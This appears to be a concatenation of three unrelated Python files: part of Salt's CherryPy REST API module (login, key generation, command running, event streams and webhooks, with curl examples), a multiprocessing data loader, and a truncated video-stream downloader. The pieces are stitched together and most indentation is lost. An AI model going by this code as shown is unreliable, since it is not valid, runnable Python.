curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
self._cp_config['tools.hypermedia_out.on'] = False
self._cp_config['tools.sessions.on'] = False
lowstate = [{
'client': 'wheel',
'fun': 'key.gen_accept',
'id_': mid,
}]
if keysize:
lowstate[0]['keysize'] = keysize
if force:
lowstate[0]['force'] = force
lowstate[0].update(kwargs)
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
perms = eauth.get(token['name'], eauth.get('*'))
if perms is None:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
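        # Illustration (hypothetical master config, not from this module): with
        #   external_auth:
        #     pam:
        #       saltuser:
        #         - .*
        #         - '@runner'
        # a successful pam login as 'saltuser' yields perms == ['.*', '@runner'].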
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
        The /run endpoint can also be used to issue commands using the salt-ssh
        subsystem. When using salt-ssh, eauth credentials should not be
        supplied; instead, authentication is handled by the SSH layer itself.
        The salt-ssh client does not require a running salt master; only a
        roster file must be present in the salt configuration directory.
        All SSH client requests are synchronous.
        **Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_sesion.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
        clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) {
console.debug('Tag: ', e.data.tag)
console.debug('Data: ', e.data.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
            var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
        The above examples show how to establish a websocket connection to Salt
        and activate real-time updates from Salt's event stream by signaling
        ``websocket client ready``.
'''
        # Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
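        # Per the docstring above, the websocket handler signals the parent end
        # of this pipe once the client sends 'websocket client ready'; that
        # unblocks pipe.recv() in event_stream and starts pushing events to the
        # connected client.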
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
            Content-Length: 17
            Content-Type: application/x-www-form-urlencoded
            foo=Foo!&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
                      revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
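        # For example, url_map['login'] = Login results in self.login = Login(),
        # which lets CherryPy's MethodDispatcher route /login to that instance.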
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.cors_tool.on': True,
},
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
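# A hedged usage sketch (not part of this module): a caller that loads this
# netapi module would typically do something like
#     root, apiopts, cpyopts = get_app(master_opts)
#     cherrypy.quickstart(root, '/', cpyopts)
# where master_opts is the parsed Salt master configuration dictionary.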
|
data_loader.py
|
from multiprocessing import Process, SimpleQueue, Value
import time
import random
import numpy as np
__all__ = ["DataLoader"]
class StopGenerator:
def __init__(self, pid=None):
self.pid = pid
def default_collate(batch):
if not batch or not isinstance(batch, list):
return batch
if isinstance(batch[0], tuple):
result = [[] for _ in range(len(batch[0]))]
for items in batch:
for idx, item in enumerate(items):
result[idx].append(item)
result_cvt = []
for i in range(len(result)):
if isinstance(result[i][0], np.ndarray):
result_cvt.append(np.stack(result[i]))
elif isinstance(result[i][0], (float, int)):
result_cvt.append(np.array(result[i]))
else:
result_cvt.append(result[i])
return tuple(result_cvt)
elif isinstance(batch[0], np.ndarray):
return np.stack(batch)
elif isinstance(batch[0], (float, int)):
return np.array(batch)
return batch
class DataLoader:
def __init__(self, generator, batch_size=0, maxsize=-1, shuffle=False, num_worker=1, collate_fn=default_collate,
seed=None):
self.generator = generator
self.batch_size = max(0, int(batch_size))
self.num_worker = max(1, int(num_worker))
self.maxsize = min(1, self.batch_size) * self.num_worker * 2 if maxsize < 0 else maxsize
self.collate_fn = collate_fn
self.shuffle = shuffle
self.seed = seed
def __iter__(self):
def sample_generator(generator, data_queue, count, tid):
if self.seed is not None:
random.seed(self.seed + tid)
np.random.seed(self.seed + tid)
idx_ls = list(range(len(generator)))
if self.shuffle:
random.shuffle(idx_ls)
for i in idx_ls:
if i % self.num_worker != tid:
continue
while count.value >= self.maxsize > 0:
time.sleep(0.02)
continue
data_queue.put(generator[i])
with count.get_lock():
count.value += 1
data_queue.put(StopGenerator(pid=tid))
with count.get_lock():
count.value += 1
data_queue = SimpleQueue()
count = Value('i', 0)
process_map = dict()
for tid in range(self.num_worker):
process = Process(target=sample_generator, args=(self.generator, data_queue, count, tid))
process.daemon = True
process.start()
process_map[tid] = process
def single_generator():
while len(process_map) > 0:
item = data_queue.get()
with count.get_lock():
count.value -= 1
if isinstance(item, StopGenerator):
del process_map[item.pid]
continue
yield item
def parallel_generator():
result = []
while len(process_map) > 0:
item = data_queue.get()
with count.get_lock():
count.value -= 1
if isinstance(item, StopGenerator):
del process_map[item.pid]
continue
result.append(item)
if len(result) >= self.batch_size:
if self.collate_fn is not None:
result = self.collate_fn(result)
yield result
result = []
return parallel_generator() if self.batch_size else single_generator()
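# A minimal usage sketch (hypothetical dataset, not part of the original
# module); it assumes an indexable dataset exposing __len__/__getitem__ and a
# fork-capable platform, since the worker target is a closure inside __iter__.
if __name__ == "__main__":
    class RangeDataset:
        """Toy dataset returning (feature vector, label) pairs."""
        def __init__(self, n=32):
            self.n = n
        def __len__(self):
            return self.n
        def __getitem__(self, idx):
            return np.full((3,), idx, dtype=np.float32), idx % 2
    loader = DataLoader(RangeDataset(), batch_size=8, shuffle=True,
                        num_worker=2, seed=0)
    for features, labels in loader:
        # default_collate stacks each tuple position: shapes (8, 3) and (8,)
        print(features.shape, labels.shape)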
|
__init__.py
|
import os
import re
import subprocess
import sys
import time
from threading import Thread, Event
import psutil
import streamlink
import youtube_dl
from common import logger
from common.timer import Timer
class DownloadBase:
url_list = None
def __init__(self, fname, url, suffix=None):
self.fname = fname
self.url = url
self.suffix = suffix
self.flag = None
self.ydl_opts = {}
def check_stream(self):
logger.debug(self.fname)
def download(self):
pass
def run(self):
file_name = self.file_name
self.ydl_opts = {'outtmpl': file_name}
if self.check_stream():
try:
                logger.info('Start downloading %s: %s' % (self.__class__.__name__, self.fname))
pid = os.getpid()
# t = Thread(target=self.kill_child_processes, args=(pid, file_name))
monitor = Monitoring(pid, file_name)
self.flag = monitor.flag
t = Thread(target=monitor.start)
t.start()
retval = self.download()
self.rename(file_name)
monitor.stop()
if retval != 0:
                    logger.info('Preparing to retry the download recursively')
self.run()
else:
                    logger.info('Download finished: ' + self.fname)
# except youtube_dl.utils.DownloadError:
# self.rename(file_name)
            # logger.info('Preparing to retry the download recursively')
# self.run()
# except:
# logger.exception('?')
finally:
                logger.info('Exiting download')
return
@staticmethod
def rename(file_name):
try:
os.rename(file_name + '.part', file_name)
            logger.info('Renamed {0} to {1}'.format(file_name + '.part', file_name))
except FileNotFoundError:
logger.info('FileNotFoundError:' + file_name)
except FileExistsError:
os.rename(file_name + '.part', file_name)
            logger.info('FileExistsError: renamed {0} to {1}'.format(file_name + '.part', file_name))
@property
def file_name(self):
file_name = '%s%s.%s' % (self.fname, str(time.time())[:10], self.suffix)
return file_name
class YDownload(DownloadBase):
# url_list = None
def __init__(self, fname, url, suffix='flv'):
super().__init__(fname, url, suffix)
def check_stream(self):
try:
self.get_sinfo()
return True
except youtube_dl.utils.DownloadError:
            # logger.debug('%s is not live, or failed to read stream info' % self.key)
            logger.debug('%s is not live, or failed to read stream info' % self.fname)
return False
def get_sinfo(self):
info_list = []
with youtube_dl.YoutubeDL() as ydl:
# cu = self.url.get(self.__class__.__name__)
if self.url:
info = ydl.extract_info(self.url, download=False)
else:
                logger.debug('%s does not exist' % self.__class__.__name__)
return
for i in info['formats']:
info_list.append(i['format_id'])
logger.debug(info_list)
return info_list
def download(self):
try:
self.dl()
except youtube_dl.utils.DownloadError:
return 1
return 0
def dl(self):
with youtube_dl.YoutubeDL(self.ydl_opts) as ydl:
# ydl.download([self.url[self.__class__.__name__]])
ydl.download([self.url])
class SDownload(DownloadBase):
def __init__(self, fname, url, suffix='mp4'):
super().__init__(fname, url, suffix)
self.stream = None
def check_stream(self):
logger.debug(self.fname)
streams = streamlink.streams(self.url)
try:
if streams:
self.stream = streams["best"]
fd = self.stream.open()
fd.close()
return True
except streamlink.StreamlinkError:
return
def download(self):
